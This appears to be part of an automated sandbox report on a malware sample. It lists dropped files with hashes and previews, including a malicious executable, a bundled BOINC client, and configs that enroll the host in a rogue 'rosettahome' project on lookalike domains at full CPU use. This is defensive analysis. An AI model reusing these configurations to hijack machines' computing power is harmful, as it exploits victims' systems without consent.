                                                                                                                                                                                                                                                                                                                                                      SSDEEP:48:9SP0nUgwyZXYI65yFRX2D3GNTTfyn0Mk1iA:9SDKaIjo3UzyE1L
                                                                                                                                                                                                                                                                                                                                                      MD5:D910AD167F0217587501FDCDB33CC544
                                                                                                                                                                                                                                                                                                                                                      SHA1:2F57441CEFDC781011B53C1C5D29AC54835AFC1D
                                                                                                                                                                                                                                                                                                                                                      SHA-256:E3699D9404A3FFC1AFF0CA8A3972DC0EF38BDAB927741E9F627C7C55CEA42E81
                                                                                                                                                                                                                                                                                                                                                      SHA-512:F1871BF28FF25EE52BDB99C7A80AB715C7CAC164DCD2FD87E681168EE927FD2C5E80E03C91BB638D955A4627213BF575FF4D9EECAEDA7718C128CF2CE8F7CB3D
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:... ftypisom....isomiso2avc1mp41....free....mdat..........E...H..,. .#..x264 - core 152 r2851 ba24899 - H.264/MPEG-4 AVC codec - Copyleft 2003-2017 - http://www.videolan.org/x264.html - options: cabac=1 ref=3 deblock=1:0:0 analyse=0x3:0x113 me=hex subme=7 psy=1 psy_rd=1.00:0.00 mixed_ref=1 me_range=16 chroma_me=1 trellis=1 8x8dct=1 cqm=0 deadzone=21,11 fast_pskip=1 chroma_qp_offset=-2 threads=4 lookahead_threads=1 sliced_threads=0 nr=0 decimate=1 interlaced=0 bluray_compat=0 constrained_intra=0 bframes=3 b_pyramid=2 b_adapt=1 b_bias=0 direct=1 weightb=1 open_gop=0 weightp=2 keyint=250 keyint_min=25 scenecut=40 intra_refresh=0 rc_lookahead=40 rc=crf mbtree=1 crf=23.0 qcomp=0.60 qpmin=0 qpmax=69 qpstep=4 ip_ratio=1.40 aq=1:1.00......e...+...s|.kG3...'.u.."...,J.w.~.d\..(K....!.+..;....h....(.T.*...M......0..~L..8..B..A.y..R..,.zBP.';j.@.].w..........c......C=.'f....gI.$^.......m5V.L...{U..%V[....8......B..i..^,....:...,..5.m.%dA....moov...lmvhd...................(...........
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):453023
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.997718157581587
                                                                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:tESTeqTI2r4ZbCgUKWKNeRcPMb6qlV7hVZe3:tEsed2Xh9/bdzZe3
                                                                                                                                                                                                                                                                                                                                                      MD5:85430BAED3398695717B0263807CF97C
                                                                                                                                                                                                                                                                                                                                                      SHA1:FFFBEE923CEA216F50FCE5D54219A188A5100F41
                                                                                                                                                                                                                                                                                                                                                      SHA-256:A9F4281F82B3579581C389E8583DC9F477C7FD0E20C9DFC91A2E611E21E3407E
                                                                                                                                                                                                                                                                                                                                                      SHA-512:06511F1F6C6D44D076B3C593528C26A602348D9C41689DBF5FF716B671C3CA5756B12CB2E5869F836DEDCE27B1A5CFE79B93C707FD01F8E84B620923BB61B5F1
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:PK.........bN...R..........gmpopenh264.dll..|.E.0.=..I.....1....4f1q.`.........q.....'+....h*m{.z..o_.{w........$..($A!...|L...B&A2.s.{..Dd......c.U.U..9u.S...K.l`...../.d.-....|.....&....9......wn..x......i.#O.+.Y.l......+....,3.3f..\..c.SSS,............N...GG...F.'.&.:'.K.Z&.>.@.g..M...M.`...*.........ZR....^jg.G.Kb.o~va.....<Z..1.#.O.e.....D..X..i..$imBW..Q&.......P.....,M.,..:.c...-...\......*.....-i.K.I..4.a..6..*...Ov=...W..F.CH.>...a.'.x...#@f...d..u.1....OV.1o}....g.5.._.3.J.Hi.Z.ipM....b.Z....%.G..F................/..3.q..J.....o...%.g.N.*.}..).3.N%.!..q*........^I.m..~...6.#.~+.....A...I]r...x..*.<IYj....p0..`S.M@.E..f.=.;!.@.....E..E....... .0.n....Jd..d......uM.-.qI.lR..z..=}..r.D.XLZ....x.$..|c.1.cUkM.&.Qn]..a]t.h..*.!.6 7..Jd.DvKJ"Wgd*%n...w...Jni.inmr.@M.$'Z.s....#)%..Rs..:.h....R....\..t.6..'.g.........Uj+F.cr:|..!..K.W.Y...17......,....r.....>.N..3.R.Y.._\...Ir.DNJdM... .k...&V-....z.%...-...D..i..&...6....7.2T).>..0..%.&.
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):5900128
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.681603016700632
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:98304:6+2pAHOueLXU0GbPaJXlr99CvGisAbPwCWTxvXXE+NKTyqp+:6JAHOueLXfCPaJXlr99Cvt3b4CYxvXXV
                                                                                                                                                                                                                                                                                                                                                      MD5:760F00E30887017CDEA9809FD1C38E52
                                                                                                                                                                                                                                                                                                                                                      SHA1:B09271E96FF73B86BD54489FBAE1C224369A8BC8
                                                                                                                                                                                                                                                                                                                                                      SHA-256:91E405E8A527023FB8696624E70498AE83660FE6757CEF4871CE9BCC659264D3
                                                                                                                                                                                                                                                                                                                                                      SHA-512:C0AAE4972748EF1E522B1B8230AB5A3A538AB4CC0F19773B359C4BC0CCB6357DC6D6F51913CB1B64F682595D9C8E6A1F5C8D60EB13A264BE2AA9E453FF1B5CCB
                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$............ln..ln..ln...m..ln...k.-ln...j..ln.<..ln.<.j..ln.<.m..ln.<.k..ln...o..ln..lo..mn.....ln.....ln..ln..ln...j..on...k..ln....ln..l...ln...l..ln.Rich.ln.........................PE..d....Pf.........."....'..@...!......`#........@..............................b.....C.[...`...................................................Q.,....P^.@.....Z.Dq....Y.`'...`a.`....4O.T....................6O.(...p3O.@.............@..............................text...|.@.......@................. ..`.rdata...Q....@..R....@.............@..@.data...t.... R.......R.............@....pdata..Dq....Z..r....R.............@..@_RDATA.......0]...... U.............@..@.rsrc...@....P^......2V.............@..@.reloc..`....`a......<Y.............@..B................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):2388536
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.995991707115608
                                                                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:49152:LvcIU6QFQzBq3nDlZAJ3j7QONdApLpDRxE7L0FjcNl7TcYna2hMuk2SVbNq:LvTkFh5Mj7jNi3EEiRcYnnXk2Sfq
                                                                                                                                                                                                                                                                                                                                                      MD5:5C56DA1927A0C85BE657E863A2675822
                                                                                                                                                                                                                                                                                                                                                      SHA1:15E037331B28C347CF6E2E651604EF2B5C741765
                                                                                                                                                                                                                                                                                                                                                      SHA-256:187DC7454A18AF3A4DD7D386E1CF7AB522664D8B6E30DDC2DAE5204403BC5504
                                                                                                                                                                                                                                                                                                                                                      SHA-512:D36997D4E793C989B0968591947295A4B42E206FDEDE635568F23CDC9EA9182BEB3166FC779E83B5D12A27C7A2113A2B6CA388C5BF1515B6FDC6842D4A6B22BE
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:PK...........X....2n$.`.Z.....boinc.exe..yXT.....1.&"0..u.a.a.a..`......Z.+A..*.Z7o.b.5.4.6E.7IoW...m...!..4.......3:=..o......{.......;..qO3.0...~x.a:...27~...fH..!.....w......y.a~...&.1L.<w.F......s...9.M7yz.2.sl.d..c.........n...5.mg.v.m...-..vV.Y...z.m.n...k..:.....rQ.......-<9.W...Y.....w..F.......z.4..n.fN...8.{M).L[4....N...L.sk.!1.z.....X.H...v.n....1L.tH.2C. ..~...N.F..b...[.$..j&0V. .y.c[...n,3)...4......f....j&.l.W.@.k..yn...ej....l.z...swW.1..M..&7Nf..ZotN..l.W...j......c.h..RG..i....9..2.`.jg.Xg+./.!y.I...0>`k........s.r........7.A..9e.m.X.]1....5.h....)`.m6cl.C..sM.{..l..e......2.]nm.......k.4..G...b...>.mZw6.e..`.g.gev.6.}7./V..Vo.....#.N....9........l.....Cu8....M.7.Ix..g....Z...../..=.V.6.!..?>..y..i.A...1. ...9E..t!..4c.E....g.p.lr6...{N..t.....W.._.N..5.o...........[..Y\.....o.X..M.H=8...^.a..u..u....-...g'.?..K.]=,.GW^...7..zc,hd.m.L....$m@.3...mK3....:...l.......k#.!8.?.oL. .w....^7.3.........d$>?.=Hv{...
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):240
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.507054532015214
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:6:8AfiM5xlhpw3fCNAZMQAG+eXKlLAGd7G19td7GVdJ:8eiufXw3qSZMQAG+eMLAGUtgdJ
                                                                                                                                                                                                                                                                                                                                                      MD5:3A2997418EDDAC7083B06B4EAE2CF413
                                                                                                                                                                                                                                                                                                                                                      SHA1:AEB63D04B573AE112D1DB79723D51B97FE7B30A0
                                                                                                                                                                                                                                                                                                                                                      SHA-256:0C2A61F8E1202100185822073CD22CE50F27C94C8EC189545627347405E92FEC
                                                                                                                                                                                                                                                                                                                                                      SHA-512:B0AD25A7742364013990062967BD406A47DE860F0FF709EB531128C1B00ECC2B1B5E84C8C551603A308A9AFBB9C3ACDF9255EA082987C99DD5B56307E8D99822
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<account>..<master_url>http://rosettahome.top/rosettahome/</master_url>..<authenticator>1_dfdacac1d4e91a74e91cfc18f518e1de</authenticator>..<project_name>rosettahome</project_name>..<project_preferences> </project_preferences>..</account>..
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):938
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.596457271252631
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24:c23hSZMAkRA/oAUjDbJv4jFW1YahjyOeJ:RxSpd/oA4vL1YaUd
                                                                                                                                                                                                                                                                                                                                                      MD5:2D2869CF40771468F523051ED737CB33
                                                                                                                                                                                                                                                                                                                                                      SHA1:2110C8A839EF0509FB3BEC0E8967C3281C86A17E
                                                                                                                                                                                                                                                                                                                                                      SHA-256:191E62287F8136AEAED806639F7FFFCBA7404575C5AF12108582831200450AF9
                                                                                                                                                                                                                                                                                                                                                      SHA-512:DCEE37CCB813D156210BC7053E5E57C06175C64A3706205F1F17B73E698400E2EE1FE7738EA6E638829F3AD3BF5A9F3731EA4AA3DE7AAB6B6EAE923D3E3F80B9
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<account>.. <master_url>http://rosettahome.cn/rosettahome/</master_url>.. <authenticator>1_dfdacac1d4e91a74e91cfc18f518e1de</authenticator>.. <project_name>rosettahome</project_name>..<project_preferences>..</project_preferences>..<gui_urls>.... <gui_url>.. <name>Message boards</name>.. <description>Correspond with other users on the rosettahome message boards</description>.. <url>http://rosettahome.cn/rosettahome/forum_index.php</url>.. </gui_url>.. <gui_url>.. <name>Your account</name>.. <description>View your account information</description>.. <url>http://rosettahome.cn/rosettahome/home.php</url>.. </gui_url>.. <gui_url>.. <name>Your tasks</name>.. <description>View the last week or so of computational work</description>.. <url>http://rosettahome.cn/rosettahome/results.php?userid=1</url>.. </gui_url>.. ..</gui_urls>..</account>..
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):240
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.507054532015214
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:6:8AfiM5xlhpw3fCNAZMQAG+eXKlLAGd7G19td7GVdJ:8eiufXw3qSZMQAG+eMLAGUtgdJ
                                                                                                                                                                                                                                                                                                                                                      MD5:3A2997418EDDAC7083B06B4EAE2CF413
                                                                                                                                                                                                                                                                                                                                                      SHA1:AEB63D04B573AE112D1DB79723D51B97FE7B30A0
                                                                                                                                                                                                                                                                                                                                                      SHA-256:0C2A61F8E1202100185822073CD22CE50F27C94C8EC189545627347405E92FEC
                                                                                                                                                                                                                                                                                                                                                      SHA-512:B0AD25A7742364013990062967BD406A47DE860F0FF709EB531128C1B00ECC2B1B5E84C8C551603A308A9AFBB9C3ACDF9255EA082987C99DD5B56307E8D99822
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<account>..<master_url>http://rosettahome.top/rosettahome/</master_url>..<authenticator>1_dfdacac1d4e91a74e91cfc18f518e1de</authenticator>..<project_name>rosettahome</project_name>..<project_preferences> </project_preferences>..</account>..
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):5900128
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.681603016700632
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:98304:6+2pAHOueLXU0GbPaJXlr99CvGisAbPwCWTxvXXE+NKTyqp+:6JAHOueLXfCPaJXlr99Cvt3b4CYxvXXV
                                                                                                                                                                                                                                                                                                                                                      MD5:760F00E30887017CDEA9809FD1C38E52
                                                                                                                                                                                                                                                                                                                                                      SHA1:B09271E96FF73B86BD54489FBAE1C224369A8BC8
                                                                                                                                                                                                                                                                                                                                                      SHA-256:91E405E8A527023FB8696624E70498AE83660FE6757CEF4871CE9BCC659264D3
                                                                                                                                                                                                                                                                                                                                                      SHA-512:C0AAE4972748EF1E522B1B8230AB5A3A538AB4CC0F19773B359C4BC0CCB6357DC6D6F51913CB1B64F682595D9C8E6A1F5C8D60EB13A264BE2AA9E453FF1B5CCB
                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:exported SGML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):223
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.691902088936175
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:6:pLC5sc4G/sRQZXzcw1MAScXzcwwW+u6+SBKHwxJQCb:s5s+/swYw1MeYwwLcoKHwTXb
                                                                                                                                                                                                                                                                                                                                                      MD5:3A49BC4F7A44C92F2E766E784D9ED5B3
                                                                                                                                                                                                                                                                                                                                                      SHA1:9F6563DD161E57BF07AF35ED13151113461DCCEF
                                                                                                                                                                                                                                                                                                                                                      SHA-256:1E51697B5E87C3F799636DAACEC8D9326FB70B317D2E96A1CD5D3FAF27BB1732
                                                                                                                                                                                                                                                                                                                                                      SHA-512:40F344036CD4D1E3BD8553F6B3C2D00377FDA8CCBB1C7FB8000942FBF68F1FE43C553F574AAB0C176FA16378F226010B755F3365419171568EF0100244D0E2B9
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<cc_config>.. Automatically retry connection to the project -->.. ..<options>..<report_results_immediately>1</report_results_immediately>..<skip_cpu_benchmarks>1</skip_cpu_benchmarks>..</options>..........</cc_config>
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (399), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):6228
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.036751633419772
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:96:fpsafz53TVvsbsiamq52epeVEShUi0NpbBre6n3jx:fPzLEbsiamWfEUi0zbBrZnTx
                                                                                                                                                                                                                                                                                                                                                      MD5:271798748AE773D9D5DB7E111AECBA5B
                                                                                                                                                                                                                                                                                                                                                      SHA1:A88432D2569EB07BC16473DF5FC9ED0B9AC2AB01
                                                                                                                                                                                                                                                                                                                                                      SHA-256:020E4BF7FD4E4BD69650F49FC956F785997B98DCB256FD1D67A986DEDA0A3548
                                                                                                                                                                                                                                                                                                                                                      SHA-512:219BFB7B017A18852FE5B6CB35157B891CB6BA42A8EF9D1B556901EF1D1A0CABBE0CC0D57250ADE4CB6786967166E0A9FB17BE5432EED5E37B60D21AFAF4AE7B
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<client_state>..<host_info>.. <timezone>-18000</timezone>.. <domain_name>932923</domain_name>.. <ip_addr>192.168.2.16</ip_addr>.. <host_cpid>311d0ac0ca7255c56948c5bdd0f525cd</host_cpid>.. <p_ncpus>4</p_ncpus>.. <p_vendor>GenuineIntel</p_vendor>.. <p_model>Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz [Family 6 Model 143 Stepping 8]</p_model>.. <p_features>fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss htt pni pclmulqdq ssse3 fma cx16 sse4_1 sse4_2 movebe popcnt aes f16c rdrandsyscall nx lm avx avx2 avx512f avx512dq adx avx512ifma avx512cd avx512bw avx512vl avx512vbmi avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg avx512_vpopcntdq fsgsbase bmi1 smep bmi2</p_features>.. <p_fpops>1000000000.000000</p_fpops>.. <p_iops>1000000000.000000</p_iops>.. <p_membw>1000000000.000000</p_membw>.. <p_calculated>1736883984.568863</p_calculated>.. <p_vm_extensions_disabled>0</p_vm_extensions_disabled>..
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (399), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):6228
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.036751633419772
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:96:fpsafz53TVvsbsiamq52epeVEShUi0NpbBre6n3jx:fPzLEbsiamWfEUi0zbBrZnTx
                                                                                                                                                                                                                                                                                                                                                      MD5:271798748AE773D9D5DB7E111AECBA5B
                                                                                                                                                                                                                                                                                                                                                      SHA1:A88432D2569EB07BC16473DF5FC9ED0B9AC2AB01
                                                                                                                                                                                                                                                                                                                                                      SHA-256:020E4BF7FD4E4BD69650F49FC956F785997B98DCB256FD1D67A986DEDA0A3548
                                                                                                                                                                                                                                                                                                                                                      SHA-512:219BFB7B017A18852FE5B6CB35157B891CB6BA42A8EF9D1B556901EF1D1A0CABBE0CC0D57250ADE4CB6786967166E0A9FB17BE5432EED5E37B60D21AFAF4AE7B
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<client_state>..<host_info>.. <timezone>-18000</timezone>.. <domain_name>932923</domain_name>.. <ip_addr>192.168.2.16</ip_addr>.. <host_cpid>311d0ac0ca7255c56948c5bdd0f525cd</host_cpid>.. <p_ncpus>4</p_ncpus>.. <p_vendor>GenuineIntel</p_vendor>.. <p_model>Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz [Family 6 Model 143 Stepping 8]</p_model>.. <p_features>fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss htt pni pclmulqdq ssse3 fma cx16 sse4_1 sse4_2 movebe popcnt aes f16c rdrandsyscall nx lm avx avx2 avx512f avx512dq adx avx512ifma avx512cd avx512bw avx512vl avx512vbmi avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg avx512_vpopcntdq fsgsbase bmi1 smep bmi2</p_features>.. <p_fpops>1000000000.000000</p_fpops>.. <p_iops>1000000000.000000</p_iops>.. <p_membw>1000000000.000000</p_membw>.. <p_calculated>1736883984.568863</p_calculated>.. <p_vm_extensions_disabled>0</p_vm_extensions_disabled>..
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):156
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.5050428683154795
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Njd9syLHrFkd8KbMeoLHkxsFJ4QoeoLHqVuezGhKbMEK9sn:NsurFkOKMeYhFaxeYzeOKM5sn
                                                                                                                                                                                                                                                                                                                                                      MD5:D17136C437A82A18A5327E7E87C6CA0D
                                                                                                                                                                                                                                                                                                                                                      SHA1:CBB6B4FDB4A0F50DA4DF718F64A0B937DF4DB39F
                                                                                                                                                                                                                                                                                                                                                      SHA-256:512D84B36726F77BFF204DBC45E9FC06C9378A67084551308AE1AF77047DEA3E
                                                                                                                                                                                                                                                                                                                                                      SHA-512:450DFB04F34E037EAD51E932EE36A1710348FD75980051A81E8869EFA2125D73781BB3A76CFFB73E83B73520D69F15E58AF23498278F6543FC561E14B71060C9
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview: <coprocs>.<warning>No NVIDIA library found</warning>.<warning>No ATI library found.</warning>.<warning>No OpenCL library found</warning>. </coprocs>.
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):118
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.469520017712775
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:bpNy/ZyFFj+ALzVV/aFRqLXVgF/Z8WtdVVt4bKKPy0hdNyn:bmxy/j+APSFRqyR8Wtdl4Wcvyn
                                                                                                                                                                                                                                                                                                                                                      MD5:CB723FE22B7435EBEE570841E2E39F26
                                                                                                                                                                                                                                                                                                                                                      SHA1:BE8A67E0DACE13A6DE166A9D56FB14DEE7454A8E
                                                                                                                                                                                                                                                                                                                                                      SHA-256:3638C84734824C148862D42CD2E2693614C664101DFD84DE90D6F49DC6824645
                                                                                                                                                                                                                                                                                                                                                      SHA-512:2EB64AC821CA4FC6AF97B9FE8BCC539EE1791A0F24E773F9D542EABED8C57BFF021AE88DF6ABDCA2727B2BE2F91ABE3167D76415F5924BBD50E79DDCE9313E5F
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<daily_xfers>..<dx>.. <when>20102</when>.. <up>0.000000</up>.. <down>6192.000000</down>..</dx>..</daily_xfers>..
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):470
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.586712410605188
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12:AnxQlQax/nWTNKob7wMUvuDOHrJf1HJ7NKFwMUvyg2OV2se:AnxvaxRvuiJfZJiQvy7nse
                                                                                                                                                                                                                                                                                                                                                      MD5:F756B1A390E4072C8096934893D5E8F0
                                                                                                                                                                                                                                                                                                                                                      SHA1:50123BB651B10F0033C328E5D55641FDE5DE7CE0
                                                                                                                                                                                                                                                                                                                                                      SHA-256:915BED1FDE23885F8EEA96858BAC6832ED4443A84D1EF31E63CD0163BB2D76D8
                                                                                                                                                                                                                                                                                                                                                      SHA-512:056421B0CAB356051034BDF3799AEDE6E3562EC45CD6BA5E2CB07FB23D3F70443F419E8AA8C6011CDD433040ACDC335C9ECF9B62801F994961E533AD8571B803
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<global_preferences>.. <run_on_batteries>1</run_on_batteries>..<max_cpus>4</max_cpus>.. <cpu_usage_limit>100.000000</cpu_usage_limit>.. <suspend_cpu_usage>100.000000</suspend_cpu_usage>..<cpu_scheduling_period_minutes>2.000000</cpu_scheduling_period_minutes>.. <run_if_user_active>1</run_if_user_active>.. <cpu_usage_limit>100.000000</cpu_usage_limit>.. <suspend_cpu_usage>0</suspend_cpu_usage>....<max_ncpus_pct>100.000000</max_ncpus_pct>.. </global_preferences>
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):32
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.757048827786958
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:DKXD0jWSRA1wUn:oeWSQX
                                                                                                                                                                                                                                                                                                                                                      MD5:EC9B1FC012E75CFD9AB949A5E67CC2D1
                                                                                                                                                                                                                                                                                                                                                      SHA1:767913963E4348CF634F84E62C33330175146131
                                                                                                                                                                                                                                                                                                                                                      SHA-256:3B1DD5E300C25807AAC5A63354133E7D9D1A2B3060C6DEC0FD292DDF1094FA8B
                                                                                                                                                                                                                                                                                                                                                      SHA-512:0102FA54E245C01B8113160F1136A4CCFB0241790D1301FADA54207635124791186DDB4767112817BAE3C67DB9E902F67B63BD38549C66BA9EBAD7EE7BE75EA5
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:c12382fb1dd64655eff9574e9a7f7d42
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):6192
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.705188161984223
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:96:+Lbrd/NddddddoQGOMJySMIp7Mt0wMr3E8V2rf8b5:+LROxOMoSMmMhMrEfU5
                                                                                                                                                                                                                                                                                                                                                      MD5:F5D0DDD9D44A2EFEC1BE2C26FB1B8E82
                                                                                                                                                                                                                                                                                                                                                      SHA1:3D83F1FE88387FD2AF9E62A25A475C2EDC707851
                                                                                                                                                                                                                                                                                                                                                      SHA-256:5F481DFB4031EABD4E89B25FCD801130EC914D97BDE647A800400303744A7771
